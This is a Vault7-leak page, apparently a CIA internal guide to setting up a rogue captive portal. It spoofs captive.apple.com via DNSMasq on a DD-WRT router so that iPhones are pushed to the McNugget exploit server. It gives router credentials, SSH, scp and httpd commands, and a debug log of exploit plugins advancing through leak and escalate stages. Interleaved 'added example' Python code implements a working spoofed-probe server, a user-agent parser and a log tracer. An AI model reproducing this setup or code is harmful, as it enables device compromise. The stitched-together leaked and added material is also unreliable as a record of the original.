Vault7: CIA Hacking Tools Revealed
Captive Portal
Summary
The following is the setup for a DNS server designed to trick a device into launching its captive portal window. The idea is that the DNS server answers for captive.apple.com, so the device's request for captive.apple.com/hotspot-detect.html is served by us and redirected to mdbtest.devlan.net/captive.html. captive.html can then forward the device to our machine running Hamr.
Set Up
The wireless router configured for the captive portal is CaptivationStation. It can be reached at 192.168.1.1; the admin user name is "Captive". The router forwards all requests for captive.apple.com/hotspot-detect.html to WildTurkey at 10.2.3.105.
WildTurkey is configured as a web server hosting hotspot-detect.html, the file Apple devices fetch to test whether they are behind a captive portal. We use this file to forward users to mdbtest.devlan.net/captive.html. The file is located at:
/var/www/html/hotspot-detect.html
It forwards devices to captive.html, which is in the same directory.
Adding Your Machine to Captive.html
1) SSH into adm_mdb@wildturkey.devlan.net
2) cd into "/var/www/html/"
3) sudo vim captive.html (Note: you MUST use sudo)
4) add a line like the following, pointing at the port your listener serves on (8080 in the McNugget output below):
<h2><a href="http://[Your IP]:8080/?id=myt">[Your Name]</a></h2>
Logging on to Captivation Station
1) Connect to CaptivationStation with the password
2) The device should connect and launch the captive portal
3) Click the link for your machine
4) To get out, hit "Cancel" and then "Use Other Network"
** If the captive portal does not open on subsequent tries, tell the device to forget the network. This is a known issue if you selected "Use Without Internet" **
New Captive Portal
- Browse to 192.168.1.1, log into your router, and go to Administration/Backup. For a factory-reset router, the defaults are:
  - SSID: dd-wrt (no password)
  - Configuration page username/password: admin/admin
- Restore the router with this backup file: nvrambak.bin
- Once the router restarts, connect to TestivationStation (the new SSID of your router) with its password
- Note: all passwords are the same as CaptivationStation
- Log back into your router using the username Captive and its password
- Verify that the new settings have been restored by going to Services/Services and making sure DNSMasq has the following entry. It makes the router answer for captive.apple.com (and every name under it) with its own address, which is why the probe page has to be served from the router itself:
address=/captive.apple.com/192.168.1.1
- SSH into the router; the password is the same one used for logging into the web configuration:
ssh root@192.168.1.1
- SCP hotspot-detect.html and captive.html over to /tmp/root on the router, e.g.:
scp ~/Desktop/captive.html root@192.168.1.1:/tmp/root
- Run the following commands on the router:
root@DD-WRT:~# killall httpd
root@DD-WRT:~# httpd -p 80 -h /tmp/root/
root@DD-WRT:~# httpd -p 81
- The first command stops the stock web UI, which holds port 80. The second serves the files in /tmp/root to the browser on port 80 (e.g. 192.168.1.1/captive.html), which is where the DNSMasq entry sends the device. The third brings the configuration UI back on port 81; you MUST use 192.168.1.1:81 to reach the router configuration page from then on.
- /tmp on DD-WRT lives in RAM, so the copied files and the httpd changes are gone after a reboot; redo the scp and the three commands after any restart.
- At this point you should be able to hit the captive portal on an iDevice.
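The mechanism behind both setups (the hotspot-detect.html on WildTurkey in the Set Up section and the copy served by httpd on the DD-WRT router here) is the same: Apple devices fetch captive.apple.com/hotspot-detect.html and only treat the network as open if they get Apple's exact "Success" page back; any other body makes the device open its captive portal sheet on the page it received. The following is an added example, not code from this page or from the Hamr/McNugget project. It runs a local stand-in for the spoofed web server that answers the probe with a forwarding page, and an Apple-style probe check that shows which responses trip the sheet. The portal URL (192.0.2.10) and the loopback port are assumptions.

```python
"""Added example (not the project's code): a local stand-in for the
WildTurkey / DD-WRT web server that answers the hotspot-detect.html probe
with a forwarding page, plus an Apple-style probe check showing why that
page makes the device open its captive-portal sheet. The portal URL and
the loopback port are assumptions."""
import http.server
import json
import threading
import urllib.error
import urllib.request
from html import escape

# What the genuine captive.apple.com returns. The device only treats the
# network as open when it gets this body back; anything else pops the sheet.
APPLE_SUCCESS_BODY = "<HTML><HEAD><TITLE>Success</TITLE></HEAD><BODY>Success</BODY></HTML>"

# Assumed stand-in for mdbtest.devlan.net/captive.html (documentation range).
PORTAL_URL = "http://192.0.2.10/captive.html"


def hotspot_detect_page(portal_url: str) -> bytes:
    """Replacement hotspot-detect.html: not the Success body (so the probe
    fails) and it forwards the sheet on to the real portal page."""
    href = escape(portal_url, quote=True)
    return (
        "<html><head>"
        f'<meta http-equiv="refresh" content="0; url={href}">'
        "</head><body>"
        f"<script>window.location.href = {json.dumps(portal_url)};</script>"
        f'<a href="{href}">Continue</a>'
        "</body></html>"
    ).encode()


class ProbeHandler(http.server.BaseHTTPRequestHandler):
    """Serves the spoofed probe page, and Apple's real answer on /success
    for comparison."""

    def do_GET(self):
        if self.path == "/hotspot-detect.html":
            body = hotspot_detect_page(PORTAL_URL)
        elif self.path == "/success":
            body = APPLE_SUCCESS_BODY.encode()
        else:
            self.send_error(404)
            return
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, fmt, *args):
        pass  # keep the example's stdout clean


def start_server():
    """Bind an ephemeral loopback port and serve in the background."""
    srv = http.server.HTTPServer(("127.0.0.1", 0), ProbeHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def probe_says_captive(url: str, timeout: float = 3.0) -> bool:
    """Apple-style check: fetch the probe URL and compare with the known
    body. A different body or an error status is what launches the portal."""
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    try:
        with opener.open(url, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace").strip()
    except urllib.error.HTTPError:
        return True
    return body != APPLE_SUCCESS_BODY


def run_demo() -> dict:
    """Start the server, run the probe against each path, tear down."""
    srv, port = start_server()
    base = f"http://127.0.0.1:{port}"
    try:
        return {
            "spoofed": probe_says_captive(f"{base}/hotspot-detect.html"),
            "genuine": probe_says_captive(f"{base}/success"),
            "missing": probe_says_captive(f"{base}/missing"),
        }
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(run_demo())
```

On the real setup the DNSMasq entry (or the CaptivationStation forward) is what lands the device on this server instead of Apple; the forwarding page then plays the role of captive.html's link to your machine on port 8080.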
Issues
** This is from old testing ~8/19 **
Initially there was an issue with the Safari_UA string. The captive portal returns line 1 below, but the regex expects something like line 2. I made the Version and Safari fields optional now. There should be a features/captive-portal branch with the modified code.
Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143
Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
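The captive portal sheet is a bare WebKit view rather than a Safari tab, so its User-Agent carries neither a Version/ nor a Safari/ token, and a regex written for full Mobile Safari strings rejects it outright. The following is an added example, not the project's regex or code: a strict pattern of the assumed original shape beside the relaxed one with both fields optional, and a parser that returns a dict with the same field names as the match dict in the McNugget output. The captive-sheet heuristic at the end is an assumption.

```python
"""Added example (not the project's code): a Safari/CNA User-Agent parser
with Version/ and Safari/ optional, beside the strict form that rejects the
captive-portal sheet's UA. Field names follow the match dict in the log."""
import re

# Shared head of a Mobile Safari UA. iPad says "CPU OS 8_4" while iPhone
# says "CPU iPhone OS 8_4", so os_type is optional.
_HEAD = (
    r"^Mozilla/5\.0 \((?P<device>iPhone|iPad|iPod touch); "
    r"(?P<cpu_type>CPU)(?: (?P<os_type>iPhone OS|OS))? "
    r"(?P<os_version>\d+(?:_\d+)*) like Mac OS X\) "
    r"AppleWebKit/(?P<webkit_version>[\d.]+) \(KHTML, like Gecko\) "
)

# Assumed original shape: Version/ and Safari/ mandatory, which is what a
# full Mobile Safari tab sends.
STRICT_UA_RE = re.compile(
    _HEAD + r"Version/(?P<version>[\d.]+) Mobile/(?P<build>\w+) "
    r"Safari/(?P<safari_version>[\d.]+)$"
)

# Relaxed form: the captive portal sheet sends neither token, so both
# become optional groups.
RELAXED_UA_RE = re.compile(
    _HEAD + r"(?:Version/(?P<version>[\d.]+) )?Mobile/(?P<build>\w+)"
    r"(?: Safari/(?P<safari_version>[\d.]+))?$"
)

# Keys of the match dict the engine logs, under the same names.
FIELDS = ("browser", "language", "os_version", "version", "cpu_type",
          "device", "os_type", "safari_version", "webkit_version", "build")


def parse_ua(ua: str, pattern: re.Pattern = RELAXED_UA_RE):
    """Return the match dict (None for absent fields), or None when the UA
    does not match, which is how the strict pattern stalled the pipeline."""
    m = pattern.match(ua)
    if m is None:
        return None
    info = dict.fromkeys(FIELDS)
    info.update(m.groupdict())
    info["browser"] = "Safari"  # the pattern only matches Safari-family UAs
    return info


def from_captive_sheet(info: dict) -> bool:
    """Heuristic (assumption): a Safari-family UA with neither Version/ nor
    Safari/ came from the captive portal sheet rather than a Safari tab."""
    return info["version"] is None and info["safari_version"] is None


# The two strings from the page: what the portal sheet sent, and what a
# Safari tab on the same build sends.
CNA_UA = ("Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) "
          "AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143")
SAFARI_UA = ("Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) "
             "AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 "
             "Mobile/12H143 Safari/600.1.4")

if __name__ == "__main__":
    for label, ua in (("sheet", CNA_UA), ("safari", SAFARI_UA)):
        print(label, "strict:", parse_ua(ua, STRICT_UA_RE) is not None,
              "relaxed:", parse_ua(ua))
```

Because os_version, webkit_version and build all sit before the optional tokens, the relaxed pattern still fills the fields the later plugins key on ('os_version' in the log), and the None values for version and safari_version are exactly what the "next dict" in the output shows.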
Now the issue seems to be in Earth's sethw function, or something along those lines. This is the output from McNugget; it does not advance any further:
User #71498@Bens-MacBook-Pro:mcnugget$ ./mctest
Execution Passphrase:
Turning off cookie support
mctest: MC | INFO: Cookie support turned off
mctest: MC | INFO: [18/Aug/2015:15:29:44] ENGINE Listening for SIGINT.
mctest: MC | INFO: [18/Aug/2015:15:29:44] ENGINE Listening for SIGHUP.
mctest: MC | INFO: [18/Aug/2015:15:29:44] ENGINE Listening for SIGTERM.
mctest: MC | INFO: [18/Aug/2015:15:29:44] ENGINE Listening for SIGUSR1.
mctest: MC | INFO: [18/Aug/2015:15:29:44] ENGINE Bus STARTING
mctest: MC | INFO: [18/Aug/2015:15:29:44] ENGINE Started monitor thread 'Autoreloader'.
mctest: MC | INFO: [18/Aug/2015:15:29:44] ENGINE Started monitor thread '_TimeoutMonitor'.
mctest: MC | INFO: [18/Aug/2015:15:29:44] ENGINE Serving on 0.0.0.0:8080
mctest: MC | INFO: [18/Aug/2015:15:29:44] ENGINE Bus STARTED
mctest: MC | 10.3.2.74 | myid | | new session created with id = '2bfc300a-e757-4307-a2a4-709bccd5ff65'
mctest: MC | 10.3.2.74 | myid | | plugin 'Eve 1.0' match failed because next stage 'enumerate' not in match stages (leak, access)
mctest: MC | 10.3.2.74 | myid | | plugin 'iOS Sol' match failed because next stage 'enumerate' not in match stages (escape, escalate)
mctest: MC | 10.3.2.74 | myid | | plugin 'iOS Sol' match failed because next stage 'enumerate' not in match stages (escape, escalate)
('~~~~~~UA String: %s', 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143')
mctest: MC | 10.3.2.74 | myid | | plugin 'Earth 1.1' match failed because next stage 'enumerate' not in match stages (leak, access)
mctest: MC | 10.3.2.74 | myid | | plugin 'Archon 1.2' match failed because match dict['os_version'] = 'None'
mctest: MC | 10.3.2.74 | myid | | plugin 'User #71895 1.0' match failed because match dict['os_version'] = 'None'
mctest: MC | 10.3.2.74 | myid | | plugin 'Safari User-Agent Enumeration' selected with score 0.5
mctest: MC | 10.3.2.74 | myid | | plugin 'Safari User-Agent Enumeration' state machine: request -> None
mctest: MC | 10.3.2.74 | myid | | plugin state: next id = none, next size = 9223372036854775807, next stage = leak, next type = content, next dict = {'browser': 'Safari', 'language': None, 'os_version': '8_4', 'version': None, 'cpu_type': 'CPU', 'device': 'iPhone', 'os_type': 'iPhone OS', 'safari_version': None, 'webkit_version': '600.1.4', 'build': '12H143'}
mctest: MC | 10.3.2.74 | myid | | plugin 'Safari User-Agent Enumeration' is finished
mctest: MC | 10.3.2.74 | myid | | plugin 'Eve 1.0' match failed because next plugin type 'content' not in match plugin types (html, javascript)
mctest: MC | 10.3.2.74 | myid | | plugin 'iOS Sol' match failed because next stage 'leak' not in match stages (escape, escalate)
mctest: MC | 10.3.2.74 | myid | | plugin 'iOS Sol' match failed because next stage 'leak' not in match stages (escape, escalate)
mctest: MC | 10.3.2.74 | myid | | plugin 'Safari User-Agent Enumeration' match failed because next stage 'leak' not in match stages (enumerate)
('~~~~~~UA String: %s', 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143')
mctest: MC | 10.3.2.74 | myid | | plugin 'Earth 1.1' match failed because next plugin type 'content' not in match plugin types (html, javascript)
mctest: MC | 10.3.2.74 | myid | | plugin 'User #71895 1.0' match failed because match dict['os_version'] = '8_4'
mctest: MC | 10.3.2.74 | myid | | plugin 'Archon 1.2' selected with score 0.5
mctest: MC | 10.3.2.74 | myid | | plugin 'Archon 1.2' state machine: request -> set_bititude
mctest: MC | INFO: 10.3.2.74 - - [18/Aug/2015:15:29:50] "GET /?id=myid HTTP/1.1" 200 495 "http://captive.apple.com/hotspot-detect.html" "Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143"
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin looped with no response 1 time(s)
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin 'Archon 1.2' state machine: set_bititude -> None
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin state: next id = none, next size = 9223372036854775807, next stage = leak, next type = javascript, next dict = {'browser': 'Safari', 'language': None, 'bititude': '64', 'os_version': '8_4', 'version': None, 'cpu_type': 'CPU', 'device': 'iPhone', 'os_type': 'iPhone OS', 'safari_version': None, 'webkit_version': '600.1.4', 'build': '12H143'}
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin 'Archon 1.2' is finished
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin 'Eve 1.0' match failed because match dict['os_version'] = '8_4'
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin 'iOS Sol' match failed because next stage 'leak' not in match stages (escape, escalate)
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin 'iOS Sol' match failed because next stage 'leak' not in match stages (escape, escalate)
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin 'Safari User-Agent Enumeration' match failed because next stage 'leak' not in match stages (enumerate)
('~~~~~~UA String: %s', 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143')
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin 'Archon 1.2' not matching because 'bititude' already set.
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin 'User #71895 1.0' match failed because match dict['os_version'] = '8_4'
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin 'Archon 1.2' not matching because 'bititude' already set.
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin 'Earth 1.1' selected with score 0.99
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | Earth: fetching index
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | Getting the desired content type: 6
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin 'Earth 1.1' state machine: request -> mainjs
mctest: MC | INFO: 10.3.2.74 - - [18/Aug/2015:15:29:50] "GET /?id=myid&sid=2bfc300a-e757-4307-a2a4-709bccd5ff65&n=c5 HTTP/1.1" 200 212 "http://10.3.2.101:8080/?id=myid" "Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143"
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin looped with no response 1 time(s)
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin 'Earth 1.1' state machine: mainjs -> sethw
mctest: MC | INFO: 10.3.2.74 - - [18/Aug/2015:15:29:50] "GET /?id=myid&sid=2bfc300a-e757-4307-a2a4-709bccd5ff65 HTTP/1.1" 200 6791 "http://10.3.2.101:8080/?id=myid" "Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143"
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | target reported status 770
mctest: MC | INFO: 10.3.2.74 - - [18/Aug/2015:15:29:51] "GET /?id=myid&sid=2bfc300a-e757-4307-a2a4-709bccd5ff65&status=770 HTTP/1.1" 200 - "http://10.3.2.101:8080/?id=myid&sid=2bfc300a-e757-4307-a2a4-709bccd5ff65" "Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143"
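When a session stops advancing like this, the question is which plugin was last selected and which state-machine edge it was on when the target reported its status. The following is an added example, not McNugget code: a small parser for the session-prefixed lines of this output that records plugin selections, state transitions and reported statuses per client id, and names the last transition. The embedded log is a constructed excerpt modelled on the output above (including one of the un-prefixed duplicate copies, which the parser discards).

```python
"""Added example (not the project's code): pull the plugin-selection trail
out of McNugget output so the point where a session stops advancing is
obvious. The sample log is a constructed excerpt modelled on the output
on this page."""
import re

SAMPLE_LOG = """\
mctest: MC | INFO: [18/Aug/2015:15:29:44] ENGINE Serving on 0.0.0.0:8080
mctest: MC | 10.3.2.74 | myid | | new session created with id = '2bfc300a-e757-4307-a2a4-709bccd5ff65'
mctest: MC | 10.3.2.74 | myid | | plugin 'Safari User-Agent Enumeration' selected with score 0.5
plugin 'Safari User-Agent Enumeration' selected with score 0.5
mctest: MC | 10.3.2.74 | myid | | plugin 'Safari User-Agent Enumeration' state machine: request -> None
mctest: MC | 10.3.2.74 | myid | | plugin 'Archon 1.2' selected with score 0.5
mctest: MC | 10.3.2.74 | myid | | plugin 'Archon 1.2' state machine: request -> set_bititude
mctest: MC | INFO: 10.3.2.74 - - [18/Aug/2015:15:29:50] "GET /?id=myid HTTP/1.1" 200 495 "http://captive.apple.com/hotspot-detect.html" "Mozilla/5.0"
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin 'Archon 1.2' state machine: set_bititude -> None
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin 'Earth 1.1' selected with score 0.99
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin 'Earth 1.1' state machine: request -> mainjs
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | plugin 'Earth 1.1' state machine: mainjs -> sethw
mctest: MC | 10.3.2.74 | myid | 2bfc300a-e757-4307-a2a4-709bccd5ff65 | target reported status 770
"""

# Only the session-prefixed lines carry state; ENGINE lines, access-log lines
# and the un-prefixed duplicate copies fail this match and are skipped.
SESSION_LINE = re.compile(
    r"^mctest: MC \| (?P<ip>[\d.]+) \| (?P<cid>[^ |]+) \| (?P<sid>[0-9a-f-]*) ?\| (?P<msg>.*)$"
)
SELECTED = re.compile(r"plugin '(?P<plugin>[^']+)' selected with score (?P<score>[\d.]+)")
TRANSITION = re.compile(r"plugin '(?P<plugin>[^']+)' state machine: (?P<src>\S+) -> (?P<dst>\S+)")
STATUS = re.compile(r"target reported status (?P<status>\d+)")


def trace_sessions(log_text: str) -> dict:
    """Map client id -> {ip, selected, transitions, statuses, last}, where
    'last' is the final (plugin, from, to) edge seen, i.e. where it stalled."""
    sessions = {}
    for line in log_text.splitlines():
        m = SESSION_LINE.match(line)
        if m is None:
            continue
        s = sessions.setdefault(
            m["cid"], {"ip": m["ip"], "selected": [], "transitions": [], "statuses": []}
        )
        msg = m["msg"]
        t = TRANSITION.search(msg)
        p = SELECTED.search(msg)
        st = STATUS.search(msg)
        if t:
            s["transitions"].append((t["plugin"], t["src"], t["dst"]))
        elif p:
            s["selected"].append((p["plugin"], float(p["score"])))
        elif st:
            s["statuses"].append(int(st["status"]))
    for s in sessions.values():
        s["last"] = s["transitions"][-1] if s["transitions"] else None
    return sessions


def summarize(sessions: dict) -> list:
    """One line per client: plugin chain, last edge, statuses reported."""
    out = []
    for cid, s in sessions.items():
        chain = " -> ".join(name for name, _ in s["selected"])
        out.append(f"{cid}@{s['ip']}: {chain}; last edge {s['last']}; status {s['statuses']}")
    return out


if __name__ == "__main__":
    for line in summarize(trace_sessions(SAMPLE_LOG)):
        print(line)
```

Run against the output above it reports the chain Safari User-Agent Enumeration -> Archon 1.2 -> Earth 1.1 with the last edge at Earth's mainjs -> sethw and a single reported status of 770, which is the stall the text describes.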